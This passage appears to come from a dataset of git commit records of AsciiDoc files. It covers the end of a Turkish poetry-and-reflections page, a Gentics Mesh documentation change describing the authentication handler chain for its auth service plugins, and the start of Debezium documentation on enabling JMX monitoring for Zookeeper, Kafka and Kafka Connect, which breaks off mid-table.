gibi...\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBir dua, Kays'\u0131n dilinden g\u00f6nl\u00fcme d\u00fc\u015fer: +\n_\"Gittik\u00e7e h\u00fcsn\u00fcn eyle ziy\u00e2de nig\u00e2r\u0131m\u0131n_ +\n_Geldik\u00e7e derdine beter et m\u00fcptel\u00e2 beni\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n-_Neden kendi c\u00fcmlelerinle konu\u015fmazs\u0131n?_ +\n-Bu h\u00e2l, akl\u0131m\u0131 setr ederken ben nas\u0131l konu\u015fay\u0131m? +\n-_Peki niye kendine s\u00f6zc\u00fcler bulursun, onlar\u0131n diliyle s\u00f6ylersin?_ +\n-Dilim kendi g\u00f6nl\u00fcmden konu\u015fsa bu ate\u015f ya\u015f yaprak m\u0131 b\u0131rak\u0131r? +\n-_Peki niye susmazs\u0131n?_ +\n-\u0130\u00e7im ile durmadan s\u00f6yle\u015firken nas\u0131l susay\u0131m? +\n-_Haberdar oldu\u011funa delilin var m\u0131d\u0131r?_ +\n-Bir ay, ayd\u0131nl\u0131\u011f\u0131n\u0131n d\u00fc\u015ft\u00fc\u011f\u00fc g\u00f6n\u00fclden big\u00e2ne midir? +\n-_Ne vakte kadar inilersin?_ +\n-Vaktin varl\u0131\u011f\u0131ndan s\u0131yr\u0131lmadan tamam olunur mu? +\n-_Neyi beklersin?_ +\n-Pervane, \u015fem tutu\u015fmadan ne yaps\u0131n? Bekledi\u011fim \u015feminden bir \u0131\u015f\u0131kt\u0131r.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::asqjpUOo3YE[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nUyutmayan sebep, sen ne g\u00fczelsin! \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYa Karacao\u011flan halim ortadad\u0131r, h\u00e2l\u00e2 uyand\u0131rmaz m\u0131? +\n_\"Perv\u00e2ne \u015fem\u2019ini uyand\u0131ramaz_ +\n_Ba\u015fta sevd\u00e2 kalpte n\u00e2r olmay\u0131nca\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00dcmit ve sab\u0131r, iki karde\u015f. Birbirlerine ne g\u00fczel sar\u0131l\u0131yor \u015fimdi. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00d6yle sermestim ki ne i\u015f ne yolculuk ne okul ne de s\u0131navdan bir yorgunluk hissediyorum. Nas\u0131l sermest olmayay\u0131m ki muhatap alm\u0131\u015fken bu bendeyi? \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00dcfleyiverdi y\u00e2reme \u015fifa deyu ol mehlik\u00e2 +\nAmma c\u00fb\u015fa getirdi i\u00e7re ate\u015fi bilmedi\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nAcemice, belki hadsizce. Dilime dolanmadan kelimeler s\u00f6ylemek kolay de\u011fil. +\nG\u00fcn do\u011fmas\u0131n pencereme ne olur, gecemi ayd\u0131nlatan ay yeter. +\n_Bir nefeslik lafz\u0131mda zikrime c\u00e2nan d\u00fc\u015fer_\n\nvideo::244526490[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nPervaneyi bir vesvese tutmu\u015f, ka\u00e7 gecedir uyumaz beni de uyutmaz. \"S\u00f6ylediklerimle \u015femi \u00fczer miyim?\", diye kara kara d\u00fc\u015f\u00fcn\u00fcr. \"Acaba \u015fem pervanenin varl\u0131\u011f\u0131ndan ho\u015fnut mudur?\" Teselli verdim, ikna etmeye kalk\u0131\u015ft\u0131m. K\u00e2r etmedi. Ne diyeyim, nas\u0131l edeyim? +\n*Pervane kendi acizli\u011fine hatalar\u0131na bak\u0131p vesveseye d\u00fc\u015ferdi. \u015eem \u00fcz\u00fclmesin; pervane tevekk\u00fcl ipine sar\u0131ld\u0131, \u00f6ylece uyudu.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nPervanenin benden ba\u015fka s\u0131rda\u015f\u0131 yok, kime anlats\u0131n halini? Kime d\u00f6ks\u00fcn i\u00e7ini? Ak\u0131tacak g\u00f6z\u00fcnden ya\u015flar\u0131 ama onlar\u0131n s\u0131rr\u0131n\u0131 if\u015fa edece\u011finden \u00e7ekinir. G\u00f6zya\u015flar\u0131n\u0131 da i\u00e7inde saklar.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u015eem'i \u00fczerlermi\u015f, yorgun b\u0131rak\u0131rlarm\u0131\u015f galiba. Be vefas\u0131z Pervane sen de durmaz kendi derdinden s\u00f6ylersin! \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u015eeyh Galib'in duas\u0131na \"Amin!\" deriz. \n\n_\"Y\u00e2resi muht\u00e2c-\u0131 k\u00e2f\u00fbr olmas\u0131n bir kimsenin_ +\n_S\u00eeneden mehp\u00e2resi d\u00fbr olmas\u0131n bir kimsenin\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::nQh3bOwTnMg[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nEn \u00e7ok yolculuklar d\u00fc\u015f\u00fcnd\u00fcr\u00fcr insana, akl\u0131na gelmeyenler yakalar karanl\u0131\u011f\u0131n ve \u0131ss\u0131zl\u0131\u011f\u0131n ortas\u0131nda.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nDilimde dua: \n\"Hata etmekten koru, us\u00fbls\u00fcz vusulden sana s\u0131\u011f\u0131nd\u0131k. Cahile yol g\u00f6ster.\" \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYazmal\u0131 m\u0131y\u0131m s\u00e2hiden? Sanki yazamad\u0131klar\u0131m\u0131 da g\u00f6nl\u00fcmden okursun. Oku ki kalks\u0131n sanc\u0131s\u0131 \u00fczerimden.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nUtana s\u0131k\u0131la, incitmekten korkarak...\n\nvideo::245933662[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n-_K\u0131r\u0131yorlar kalbini, yoruyorlar g\u00f6nl\u00fcn\u00fc nas\u0131l \u015fifa buluyorsun?_ +\n-Bir emanet gibi saklad\u0131\u011f\u0131m c\u00fcmlelerini okuyup okuyup deva buluyorum.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::QKnuIhKRWu0[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_\"Y\u00fcz \u00e7evirmem olsa d\u00fcnya bir yana ben bir yana_ +\n_\u015eem\u2019ine perv\u00e2neyim perv\u00e2 ne l\u00e2z\u0131md\u0131r bana_ +\n_Anlas\u0131n b\u00eeg\u00e2ne bilsin \u00e2\u015fin\u00e2 sevdim seni\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nMadem and\u0131k, bug\u00fcn de K\u00e2ni s\u00f6ylesin: \n\n_\"M\u00e2hum seni ben pen\u00e7e-i h\u00fbr\u015f\u00eede degi\u015fmem_ +\n_Ol s\u00eene-i s\u00e2f\u00ee dem-i isp\u00eede degi\u015fmem\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nHadsizli\u011fin zirvesinde yan\u0131mda utanc\u0131m... Bir y\u0131l evvelin sesidir yank\u0131lanan ve \u00e7irkindir, bilirim. G\u00fczel k\u0131lan yeg\u00e2ne \u015feydir i\u015fitecek olan kulaklar. \n\n\"_Sevgili Dost,_ +\n_Schumann: \"\u00e7alarken, seni kimin dinledi\u011fini umursama\" diyor. Bense umursuyorum, kimin dinledi\u011fini.\"_ +\n\nhttps:\/\/vimeo.com\/246656385\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"fabfbd482ef9a7c0f7a6741bce8daeacee8ce3d0","subject":"Add auth flow information","message":"Add auth flow information\n","repos":"gentics\/mesh,gentics\/mesh,gentics\/mesh,gentics\/mesh","old_file":"doc\/src\/main\/docs\/plugin-types\/auth-service-plugin.asciidoc","new_file":"doc\/src\/main\/docs\/plugin-types\/auth-service-plugin.asciidoc","new_contents":"---\ntitle: Authentication Service Plugin API\n---\n\ninclude::content\/docs\/variables.adoc-include[]\n\n== Intro\n\nAuthentication Service Plugin API can be used to create plugins which can extend the authentication\/authorization functionality of Gentics Mesh.\n\nThose plugins are intended to work in conjunction with the link:{{< relref \"authentication.asciidoc\" >}}#_oauth2[OAuth2] interation. When the OAuth2 integration with the Keycloak Identity Provider is enabled Gentics Mesh will automatically sync users provided by Keycloak with the users that are stored in Gentics Mesh.\n\nOnce a JWT has been obtained by keycloak it can be used for Gentics Mesh requests. The token is validated and the user is synced. \n\nOften it is however also desired to sync permission specific information from identity provider. This is where most of the Authentication Service Plugin API comes into play. The API can be used to create plugins which map the information from the JWT to Gentics Mesh roles and groups.\n\nThis way any public claim information from the JWT can be used to dynamically update the user, create roles and groups.\n\n== Flow\n\nA typical request which needs authentication passes through various handlers which try to autenticate. The `MeshAuthChain` is currently responsible for passing the requests along these handlers.\n\n=== JWT handler\n\nThis handler tries to authenticate the request by validating the JWT against the Gentics Mesh keystore certificate. The identified user will be added to the request when this succeeds. In this case no other authentication handler in the chain is called.\n\nNOTE: Failed authentications at this stage will yield a `Could not authenticate token.` warning. This warning will be removed in future versions of Gentics Mesh. The next handler in the chain will be used if the JWT handler was unable to authenticate the user.\n\n=== OAuth handler\n\nThis handler will utilize the configured or provided public keys to validate the request.\nThe `AuthServicePlugin` API will be called when the request JWT could be validated with the provided public keys.\n\nFirst the `acceptToken` method gets called to check if any of the plugins rejects the request.\n\nNext the mapping process will be invoked. The token information will be inspected to check whether a mapping call is needed.\n\nThe `extractUsername` method gets called to identify and load the user.\nOnce the user has been loaded\n\nNOTE: The `jti` or `iat` of the JWT will be used to decide whether a fresh mapping call must be invoked. The JWT will only be passed to the mapping code if it has not yet been handled.\n\nFinally the `mapToken` method will be called for every `AuthServicePlugin`.\n\n=== Anonymous Auth Handler\n\nThis handler will only be utilized when no authentication information have been added to the request and when the anonymous authentication has been enabled. The handler will automatically assign the anonymous user to the request and accept it.\n\n== Setup\n\nThe `AuthServicePlugin` interface must be used for an authentication plugin. This interface provides various methods which will be invoked by Gentics Mesh during the authentication process.\n\n\n== Mapping JWT\n\n.AuthServicePlugin methods excerpt\n[options=\"header\"]\n|======\n| Method | Description\n| `AuthServicePlugin#mapToken()` | Use the token information to create a mapping result which will be used to sync user, groups, roles.\n|======\n\nThe information from the returned `MappingResult` will be used to sync the elements in Gentics Mesh. Any of the fields in the result can be omitted.\n\nSync process is as follows:\n\n1. Update user with `MappingResult#getUser` information or use _default mapper_ if no user was specified.\n2. Create roles that are listed in `MappingResult#getRoles`.\n3. Create groups that are listed in `MappingResult#getGroups`.\n4. Assign user to groups of `MappingResult#getGroups` list.\n5. Link roles that are listed within `MappingResult#getGroups` entries to the groups (via `GroupResponse#getRoles`).\n6. Iterate over all roles of the mapped groups and invoke `MappingResult#getRoleFilter` to check whether the role should be unlinked from the group. You can use this to ensure that only specific roles are links to the groups.\n7. Link roles that are listed within `MappingResult#getRoles` entries to the groups (via `GroupResponse#getGroups`).\n8. Iterate over all groups of the user and invoke `MappingResult#getGroupFilter` to check whether the user should be removed from the group. You can use this to ensure that the use is only part of specific groups.\n\nNOTE: A default mapper which maps _firstname_, _lastname_, _email address_ will be used for user information if you do not set the user field in the `MappingResult` object.\n\nNOTE: The synchronization process will only be invoked if the access token changes. Remember that you need to issue a new access token if you change the mapping in keycloak. The old token may still contain the old information.\n\nWARNING: It is important to note that the mapper API can not be used to *delete* users, roles or groups.\n\n== Utils\n\nThe `AuthServicePluginUtils` provides additional utility functions that can be used in your plugin implementation. The `AuthServicePluginUtils#createRoleFilter()` and `AuthServicePluginUtils#createGroupFilter()` methods can be used to create filters which will only keep role\/group, user\/group assignments that have been specified in the given lists.\n\nThis is useful if you want to ensure that users only belong in the groups that are managed by your identity provider\/auth plugin.\n\n== Examples\n\n* link:https:\/\/github.com\/gentics\/mesh-plugin-examples\/tree\/master\/authentication-plugin[Authentication Service Plugin Example]","old_contents":"---\ntitle: Authentication Service Plugin API\n---\n\ninclude::content\/docs\/variables.adoc-include[]\n\n== Intro\n\nAuthentication Service Plugin API can be used to create plugins which can extend the authentication\/authorization functionality of Gentics Mesh.\n\nThose plugins are intended to work in conjunction with the link:{{< relref \"authentication.asciidoc\" >}}#_oauth2[OAuth2] interation. When the OAuth2 integration with the Keycloak Identity Provider is enabled Gentics Mesh will automatically sync users provided by Keycloak with the users that are stored in Gentics Mesh.\n\n\nOnce a JWT has been obtained by keycloak it can be used for Gentics Mesh requests. The token is validated and the user is sycned. \n\nOften it is however also desired to sync permission specific information from identity provider. This is where most of the Authentication Service Plugin API comes into play. The API can be used to create plugins which map the information from the JWT to Gentics Mesh roles and groups.\n\nThis way any public claim information from the JWT can be used to dynamically update the user, create roles and groups.\n\n== Setup\n\nThe `AuthServicePlugin` interface must be used for an authentication plugin. This interface provides various methods which will be invoked by Gentics Mesh during the authentication process.\n\n\n== Mapping JWT\n\n.AuthServicePlugin methods excerpt\n[options=\"header\"]\n|======\n| Method | Description\n| `AuthServicePlugin#mapToken()` | Use the token information to create a mapping result which will be used to sync user, groups, roles.\n|======\n\nThe information from the returned `MappingResult` will be used to sync the elements in Gentics Mesh. Any of the fields in the result can be omitted.\n\nSync process is as follows:\n\n1. Update user with `MappingResult#getUser` information or use _default mapper_ if no user was specified.\n2. Create roles that are listed in `MappingResult#getRoles`.\n3. Create groups that are listed in `MappingResult#getGroups`.\n4. Assign user to groups of `MappingResult#getGroups` list.\n5. Link roles that are listed within `MappingResult#getGroups` entries to the groups (via `GroupResponse#getRoles`).\n6. Iterate over all roles of the mapped groups and invoke `MappingResult#getRoleFilter` to check whether the role should be unlinked from the group. You can use this to ensure that only specific roles are links to the groups.\n7. Link roles that are listed within `MappingResult#getRoles` entries to the groups (via `GroupResponse#getGroups`).\n8. Iterate over all groups of the user and invoke `MappingResult#getGroupFilter` to check whether the user should be removed from the group. You can use this to ensure that the use is only part of specific groups.\n\nNOTE: A default mapper which maps _firstname_, _lastname_, _email address_ will be used for user information if you do not set the user field in the `MappingResult` object.\n\nNOTE: The synchronization process will only be invoked if the access token changes. Remember that you need to issue a new access token if you change the mapping in keycloak. The old token may still contain the old information.\n\nWARNING: It is important to note that the mapper API can not be used to *delete* users, roles or groups.\n\n== Utils\n\nThe `AuthServicePluginUtils` provides additional utility functions that can be used in your plugin implementation. The `AuthServicePluginUtils#createRoleFilter()` and `AuthServicePluginUtils#createGroupFilter()` methods can be used to create filters which will only keep role\/group, user\/group assignments that have been specified in the given lists.\n\nThis is useful if you want to ensure that users only belong in the groups that are managed by your identity provider\/auth plugin.\n\n== Examples\n\n* link:https:\/\/github.com\/gentics\/mesh-plugin-examples\/tree\/master\/authentication-plugin[Authentication Service Plugin Example]","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eacc624001f55dbbe70bf987884c26a3e3c3945c","subject":"Adding section on Prometheus\/Grafana to monitoring docs","message":"Adding section on Prometheus\/Grafana to monitoring docs","repos":"debezium\/debezium,jpechane\/debezium,debezium\/debezium,debezium\/debezium,jpechane\/debezium,debezium\/debezium,jpechane\/debezium,jpechane\/debezium","old_file":"documentation\/modules\/ROOT\/pages\/operations\/monitoring.adoc","new_file":"documentation\/modules\/ROOT\/pages\/operations\/monitoring.adoc","new_contents":"= Monitoring Debezium\ninclude::..\/_attributes.adoc[]\n:linkattrs:\n:icons: font\n:toc:\n:toc-placement: macro\n\ntoc::[]\n\nDebezium uses Kafka and Zookeeper, and all of these support monitoring via JMX. In fact, there are a lot of https:\/\/zookeeper.apache.org\/doc\/r3.1.2\/zookeeperJMX.html[Zookeeper metrics] and even more http:\/\/docs.confluent.io\/3.0.0\/kafka\/monitoring.html[Kafka metrics] available. But how JMX is enabled in these services depends on whether you're running them in Docker containers or using the standard installations.\n\n[NOTE]\n====\nIf you are running multiple services on the same machine, be sure to use distinct JMX ports for each service.\n====\n\n\n== Local installations\n\nJMX can be enabled in Zookeeper, Kafka, and Kafka Connect using their standard installations and environment variables when running the startup commands.\n\n=== Local Zookeeper\n\nZookeeper has built-in support for JMX. When running Zookeeper using a local installation, the `zkServer.sh` script recognizes the following environment variables:\n\n[cols=\"35%a,10%a,55%a\",options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Environment Variable\n|Default\n|Description\n\n|`JMXPORT`\n|\n|Enables JMX and specifies the port number that will be used for JMX. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.port=$JMXPORT`.\n\n|`JMXAUTH`\n|`false`\n|Whether JMX clients must use password authentication when connecting. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.authenticate=$JMXAUTH`.\n\n|`JMXSSL`\n|`false`\n|Whether JMX clients connect using SSL\/TLS. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.ssl=$JMXSSL`.\n\n|`JMXLOG4J`\n|`true`\n|Whether the Log4J JMX MBeans should be disabled. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dzookeeper.jmx.log4j.disable=$JMXLOG4J`.\n|=======================\n\n=== Local Kafka\n\nWhen running Kafka using a local installation, the `kafka-server-start.sh` script recognizes the following environment variables:\n\n\n[cols=\"35%a,10%a,55%a\",options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Environment Variable\n|Default\n|Description\n\n|`JMX_PORT`\n|\n|Enables JMX and specifies the port number that will be used for JMX. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.port=$JMX_PORT`.\n\n|`KAFKA_JMX_OPTS`\n|`-Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false `\n|JMX options, passed directly to the JVM during startup.\n|=======================\n\n\n=== Local Kafka Connect\n\nWhen running Kafka using a local installation, the `connect-distributed.sh` script recognizes the following environment variables:\n\n\n[cols=\"35%a,10%a,55%a\",options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Environment Variable\n|Default\n|Description\n\n|`JMX_PORT`\n|\n|Enables JMX and specifies the port number that will be used for JMX. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.port=$JMX_PORT`.\n\n|`KAFKA_JMX_OPTS`\n|`-Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false `\n|JMX options, passed directly to the JVM during startup.\n|=======================\n\n\n== Using Docker\n\nEnable JMX for a JVM running in a Docker container requires several additional options not normally needed when running on a local machine. This is because the JVM requires the hostname to which it will advertise itself to JMX clients. Because of this, Debezium's Docker images for Zookeeper, Kafka, and Kafka Connect use several environment variables to enable and configure JMX. Most of the environment variables are the same for all of the images, but there are some minor differences.\n\n=== Zookeeper in Docker\n\nThe `debezium\/zookeeper` image recognizes the following JMX-related environment variables:\n\n[cols=\"35%a,10%a,55%a\",options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Environment Variable\n|Default\n|Description\n\n|`JMXPORT`\n|\n|Required. The port number that will be used for JMX. The value is used to specify the JVM parameters `-Dcom.sun.management.jmxremote.port=$JMXPORT` and `-Dcom.sun.management.jmxremote.rmi.port=$JMXPORT`.\n\n|`JMXHOST`\n|\n|Required. The IP address or resolvable hostname of the Docker host, which JMX uses to construct a URL sent to the JMX client. A value of `localhost` or `127.0.0.1` will not work. The value is used to specify the JVM parameter `-Djava.rmi.server.hostname=$JMXHOST`.\n\n|`JMXAUTH`\n|`false`\n|Whether JMX clients must use password authentication when connecting. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.authenticate=$JMXAUTH`.\n\n|`JMXSSL`\n|`false`\n|Whether JMX clients connect using SSL\/TLS. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.ssl=$JMXSSL`.\n\n|`JMXLOG4J`\n|`true`\n|Whether the Log4J JMX MBeans should be disabled. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dzookeeper.jmx.log4j.disable=$JMXLOG4J`.\n|=======================\n\nThe following example Docker command start a container using the `debezium\/zookeeper` image with values for the `JMXPORT` and `JMXHOST` environment variables, and maps the Docker host's port 9010 to the container's JMX port:\n\n```\ndocker run -it --rm --name zookeeper -p 2181:2181 -p 2888:2888 -p 3888:3888 -p 9010:9010 -e JMXPORT=9010 -e JMXHOST=10.0.1.10 debezium\/zookeeper:latest\n```\n\n=== Kafka in Docker\n\nThe `debezium\/kafka` image recognizes the following JMX-related environment variables:\n\n[cols=\"35%a,10%a,55%a\",options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Environment Variable\n|Default\n|Description\n\n|`JMXPORT`\n|\n|Required. The port number that will be used for JMX. The value is used to specify the JVM parameters `-Dcom.sun.management.jmxremote.port=$JMXPORT` and `-Dcom.sun.management.jmxremote.rmi.port=$JMXPORT`.\n\n|`JMXHOST`\n|\n|Required. The IP address or resolvable hostname of the Docker host, which JMX uses to construct a URL sent to the JMX client. A value of `localhost` or `127.0.0.1` will not work. The value is used to specify the JVM parameter `-Djava.rmi.server.hostname=$JMXHOST`.\n\n|`JMXAUTH`\n|`false`\n|Whether JMX clients must use password authentication when connecting. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.authenticate=$JMXAUTH`.\n\n|`JMXSSL`\n|`false`\n|Whether JMX clients connect using SSL\/TLS. Must be either `true` or `false`. The value is used to specify the JVM parameter `-Dcom.sun.management.jmxremote.ssl=$JMXSSL`.\n|=======================\n\n\nThe following example Docker command start a container using the `debezium\/kafka` image with values for the `JMXPORT` and `HOST_NAME` environment variables, and maps the Docker host's port 9011 to the container's JMX port:\n\n```\ndocker run -it --rm --name kafka -p 9092:9092 -p 9011:9011 -e JMXPORT=9011 -e JMXHOST=10.0.1.10 --link zookeeper:zookeeper debezium\/kafka:latest\n```\n\n== Kafka Connect in Docker\n\nThe `debezium\/connect` image recognizes the following JMX-related environment variables:\n\n[cols=\"35%a,10%a,55%a\",options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Environment Variable\n|Default\n|Description\n\n|`JMXPORT`\n|\n|Required. The port number that will be used for JMX. The value is used to specify the JVM parameters `-Dcom.sun.management.jmxremote.port=$JMXPORT` and `-Dcom.sun.management.jmxremote.rmi.port=$JMXPORT`.\n\n|`JMXHOST`\n|\n|Required. The IP address or resolvable hostname of the Docker host, which JMX uses to construct a URL sent to the JMX client. A value of `localhost` or `127.0.0.1` will not work. The value is used to specify the 